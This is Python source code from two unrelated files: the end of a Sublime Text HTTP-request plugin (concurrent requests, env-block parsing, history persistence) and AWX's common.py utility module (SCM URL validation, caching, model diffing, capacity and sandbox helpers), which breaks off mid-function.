view.settings().set(setting, self.view.settings().get(setting, None))
def make_requests(self, requests, env=None):
"""Make requests concurrently using a `ThreadPool`, which itself runs on
an alternate thread so as not to block the UI.
"""
pools = self.RESPONSE_POOLS
pool = ResponseThreadPool(requests, env, self.MAX_WORKERS, self.view) # pass along env vars to thread pool
pools.put(pool)
while pools.qsize() > self.MAX_NUM_RESPONSE_POOLS:
old_pool = pools.get()
old_pool.is_done = True # don't display responses for a pool which has already been removed
sublime.set_timeout_async(pool.run, 0) # run on an alternate thread
sublime.set_timeout(lambda: self.gather_responses(pool), 15)
# small delay to show activity for requests that are returned in less than REFRESH_MS
def _show_activity_for_pending_requests(self, requests, count):
"""Show activity indicator in status bar.
"""
activity = self.get_activity_indicator(count, self.ACTIVITY_SPACES)
self.view.set_status('requester.activity', '{} {}'.format('Requester', activity))
self.show_activity_for_pending_requests(requests, count, activity)
def gather_responses(self, pool, count=0, responses=None):
"""Inspect thread pool at regular intervals to remove completed responses
and handle them, and show activity for pending requests.
Clients can handle responses and errors one at a time as they are
completed, or as a group when they're all finished. Each response objects
contains `request`, `response`, `error`, and `ordering` keys.
"""
self._show_activity_for_pending_requests(pool.get_pending_requests(), count)
is_done = pool.is_done # cache `is_done` before removing responses from pool
if responses is None:
responses = []
for _ in range(len(pool.responses)):
response = pool.responses.popleft()
responses.append(response)
self.handle_response(response)
if is_done:
responses.sort(key=lambda response: response.req.ordering)
self.handle_responses(responses)
self.handle_errors(responses)
self.persist_requests(responses)
self.view.set_status('requester.activity', '')
return
sublime.set_timeout(lambda: self.gather_responses(pool, count+1, responses), self.REFRESH_MS)
def persist_requests(self, responses):
"""Persisting requests is NOT thread safe, so this wrapper locks access to
`persist_requests`. Failure to do this results in corruption of the
history file sooner or later.
"""
with self.LOCK:
persist_requests(self, responses)
def add_error_status_bar(self, error):
"""Logs error to console, and adds error in status bar. Not as obtrusive
as `sublime.error_message`.
"""
self._status_errors.append(error)
print('{}: {}'.format('Requester Error', error))
self.view.set_status('requester.errors', '{}: {}'.format(
'RequesterErrors', ', '.join(self._status_errors)
))
def reset_status(self):
"""Make sure this is called _before_ `add_error_status_bar`.
"""
self._status_errors = []
self.view.set_status('requester.errors', '')
self.view.set_status('requester.download', '')
self.view.set_status('requester.benchmarks', '')
@staticmethod
def parse_env(text):
"""Parses `text` for first env block, and returns text within this env
block.
Also returns line numbers for start of env block and env file.
"""
delimeter = '###env'
in_block = False
env_lines = []
env_block_line_number = None
env_file_line_number = None
for i, line in enumerate(text.splitlines()):
if in_block:
if line == delimeter:
in_block = False
break
env_lines.append(line)
else:
if line == delimeter:
env_block_line_number = i
in_block = True
scope = {}
p = re.compile(r'\s*env_file\s*=.*')
for i, line in enumerate(text.splitlines()):
if p.match(line): # matches only at beginning of string
try:
exec(line, scope) # add `env_file` to `scope` dict
env_file_line_number = i
except Exception as e:
print(e)
break # stop looking after first match
env_file = scope.get('env_file')
if not len(env_lines) or in_block: # env block must be closed to take effect
return None, None, env_file, env_file_line_number
return '\n'.join(env_lines), env_block_line_number, env_file, env_file_line_number
@staticmethod
def get_env_dict_from_string(s):
"""What it sounds like.
http://stackoverflow.com/questions/5362771/load-module-from-string-in-python
"""
try:
del sys.modules['requester.env'] # this avoids a subtle bug, DON'T REMOVE
except KeyError:
pass
if not s:
return {}
env = imp.new_module('requester.env')
try:
with add_path(__file__, '..', '..', 'deps'):
exec(s, env.__dict__)
except Exception as e:
sublime.error_message(
'EnvBlock Error:\n{}\n\nOpen the console to see the full environment string'.format(e))
print('\nEnvString:\n```\n{}\n```'.format(s))
return {}
else:
return dict(env.__dict__)
@staticmethod
def get_activity_indicator(count, spaces):
"""Return activity indicator string.
"""
cycle = count // spaces
if cycle % 2 == 0:
before = count % spaces
else:
before = spaces - (count % spaces)
after = spaces - before
return '[{}={}]'.format(' ' * before, ' ' * after)
def persist_requests(self, responses, history_path=None):
"""Persist up to N requests to a history file, along with the context
needed to rebuild the env for these requests. One entry per unique
request. Old requests are removed when requests exceed file capacity.
Requests in history are keyed for uniqueness on request string + file.
"""
history_file = self.config.get('history_file', None)
if not history_file:
return
if not history_path:
history_path = os.path.join(sublime.packages_path(), 'User', history_file)
try:
with open(history_path, 'r') as f:
text = f.read() or '{}'
except FileNotFoundError:
open(history_path, 'w').close() # create history file if it doesn't exist
text = '{}'
except Exception as e:
sublime.error_message('HistoryFile Error:\n{}'.format(e))
return
rh = json.loads(text, object_pairs_hook=OrderedDict)
meta = None
for response in responses: # insert new requests
req, res, err = response
if res is None:
continue
if 'streamed' in req.skwargs:
meta = 'streamed: {}'.format(req.skwargs['streamed'])
if 'chunked' in req.skwargs:
meta = 'chunked: {}'.format(req.skwargs['chunked'])
if 'filename' in req.skwargs:
meta = 'download: {}'.format(req.skwargs['filename'] or './')
tabname = req.skwargs.get('tabname')
method, url = res.request.method, res.url
file = self.view.settings().get('requester.file', None)
_, original_request = self.view.settings().get('requester.binding_info', [None, None])
if original_request is not None and prepend_library(original_request) == req.request:
original_request = None # don't waste space in hist file if these requests are identical
key = '{};;{}'.format(req.request, file) if file else req.request
if key in rh:
rh.pop(key, None) # remove duplicate requests
rh[key] = {
'ts': int(time()),
'env_string': self.view.settings().get('requester.env_string', None),
'file': file,
'method': method,
'meta': meta,
'url': url,
'code': res.status_code,
'request': req.request,
'original_request': original_request,
'tabname': tabname,
}
# remove oldest requests if number of requests has exceeded `history_max_entries`
history_max_entries = self.config.get('history_max_entries', 250)
to_delete = len(rh) - history_max_entries
if to_delete > 0:
keys = []
iter_ = iter(rh.keys())
for _ in range(to_delete):
try:
keys.append(next(iter_))
except StopIteration:
break
for key in keys:
try:
del rh[key]
except KeyError:
pass
write_json_file(rh, history_path)
def write_json_file(data, path):
"""Safely write `data` to file at `path`.
https://stackoverflow.com/questions/1812115/how-to-safely-write-to-a-file
"""
path_temp = path + '.tmp'
path_backup = path + '.bkp'
with open(path_temp, 'w') as f:
f.write(json.dumps(data)) # write to temp file to ensure no data loss if exception raised here
os.rename(path, path_backup) # create backup file in case rename is unsuccessful
os.rename(path_temp, path)
|
common.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
logger = logging.getLogger('awx.main.utils')
__all__ = [
'get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize',
'memoize_delete', 'get_ansible_version', 'get_ssh_version', 'get_licenser',
'get_awx_version', 'update_scm_url', 'get_type_for_model', 'get_model_for_type',
'copy_model_by_class', 'region_sorting', 'copy_m2m_relationships',
'prefetch_page_capabilities', 'to_python_boolean', 'ignore_inventory_computed_fields',
'ignore_inventory_group_removal', '_inventory_updates', 'get_pk_from_dict', 'getattrd',
'getattr_dne', 'NoDefaultProvided', 'get_current_apps', 'set_current_apps',
'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity',
'get_cpu_capacity', 'get_mem_capacity', 'wrap_args_with_proot', 'build_proot_temp_dir',
'check_proot_installed', 'model_to_dict', 'NullablePromptPseudoField',
'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError',
'get_custom_venv_choices', 'get_external_account', 'task_manager_bulk_reschedule',
'schedule_task_manager', 'classproperty', 'create_temporary_fifo', 'truncate_stdout',
]
def get_object_or_400(klass, *args, **kwargs):
'''
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
'''
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def region_sorting(region):
# python3's removal of sorted(cmp=...) is _stupid_
if region[1].lower() == 'all':
return ''
elif region[1].lower().startswith('us'):
return region[1]
return 'ZZZ' + str(region[1])
def camelcase_to_underscore(s):
'''
Convert CamelCase names to lowercase_with_underscore.
'''
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
'''
Convert lowercase_with_underscore names to CamelCase.
'''
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
'''
Logging filter to output when in DEBUG mode or running tests.
'''
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
'''
Decorator to wrap a function and cache its result.
'''
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
def _get_ansible_version(ansible_path):
'''
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
'''
try:
proc = subprocess.Popen([ansible_path, '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
@memoize()
def get_ansible_version():
return _get_ansible_version('ansible')
@memoize()
def get_ssh_version():
'''
Return SSH version installed.
'''
try:
proc = subprocess.Popen(['ssh', '-V'],
stderr=subprocess.PIPE)
result = smart_str(proc.communicate()[1])
return result.split(" ")[0].split("_")[1]
except Exception:
return 'unknown'
def get_awx_version():
'''
Return AWX version as reported by setuptools.
'''
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
class StubLicense(object):
features = {
'activity_streams': True,
'ha': True,
'ldap': True,
'multiple_organizations': True,
'surveys': True,
'system_tracking': True,
'rebranding': True,
'enterprise_auth': True,
'workflows': True,
}
def validate(self):
return dict(license_key='OPEN',
valid_key=True,
compliant=True,
features=self.features,
license_type='open')
def get_licenser(*args, **kwargs):
try:
from tower_license import TowerLicense
return TowerLicense(*args, **kwargs)
except ImportError:
return StubLicense(*args, **kwargs)
def update_scm_url(scm_type, url, username=True, password=True,
check_special_cases=True, scp_format=False):
'''
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
'''
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# hg: http://www.selenic.com/mercurial/hg.1.html#url-paths
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'hg', 'svn', 'insights'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
#if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
#if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git and hg.
elif scm_type in ('git', 'hg'):
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'hg': ('http', 'https', 'ssh', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https')
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
#raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
special_hg_hosts = ('bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'hg' and parts.scheme == 'ssh' and parts.hostname in special_hg_hosts and netloc_username != 'hg':
raise ValueError(_('Username must be "hg" for SSH access to %s.') % parts.hostname)
if scm_type == 'hg' and parts.scheme == 'ssh' and netloc_password:
#raise ValueError('Password not supported for SSH with Mercurial.')
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type != "insights":
netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {
'user': ['last_login'],
'oauth2accesstoken': ['last_used'],
'oauth2application': ['client_secret']
}
field_blacklist = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(obj._meta.model_name, [])
if field_blacklist:
allowed_fields = [f for f in allowed_fields if f not in field_blacklist]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (
isinstance(field_val, str) and
field_val.startswith('$encrypted$')
):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not(old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not(new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
'''
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
'''
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
'''
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
'''
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
'''
Return type name for a given model class.
'''
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
'''
Return model class for a given type name.
'''
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
'''
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
'''
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(Q(
Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
Q(**{'%s__isnull' % res_path: True})))
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(
_('Input type `{data_type}` is not a dictionary').format(
data_type=data_type)
)
def parse_yaml_or_json(vars_str, silent_failure=True):
'''
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
'''
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_(
'Variables not compatible with JSON standard (error: {json_error})').format(
json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(_(
'Cannot parse as JSON (error: {json_error}) or '
'YAML (error: {yaml_error}).').format(
json_error=str(json_err), yaml_error=str(yaml_err)))
return vars_dict
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
'''
Measure system memory and use it as a baseline for determining the system's capacity
'''
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
'''
Context manager to ignore updating inventory computed fields.
'''
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times.
"""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
'''
Context manager to ignore moving groups/hosts when group is deleted.
'''
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
'''
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
'''
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
@memoize()
def check_proot_installed():
'''
Check that proot is installed.
'''
from django.conf import settings
cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
logger.exception('bwrap unavailable for unexpected reason.')
return False
def build_proot_temp_dir():
'''
Create a temporary directory for proot to use.
'''
from django.conf import settings
path = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
return path
def wrap_args_with_proot(args, cwd, **kwargs):
'''
Wrap existing command line with proot to restrict access to:
- AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
For non-isolated nodes:
- /etc/tower (to prevent obtaining db info or secret key)
- /var/lib/awx (except for current project)
- /var/log/tower
- /var/log/supervisor
'''
from django.conf import settings
cwd = os.path.realpath(cwd)
new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
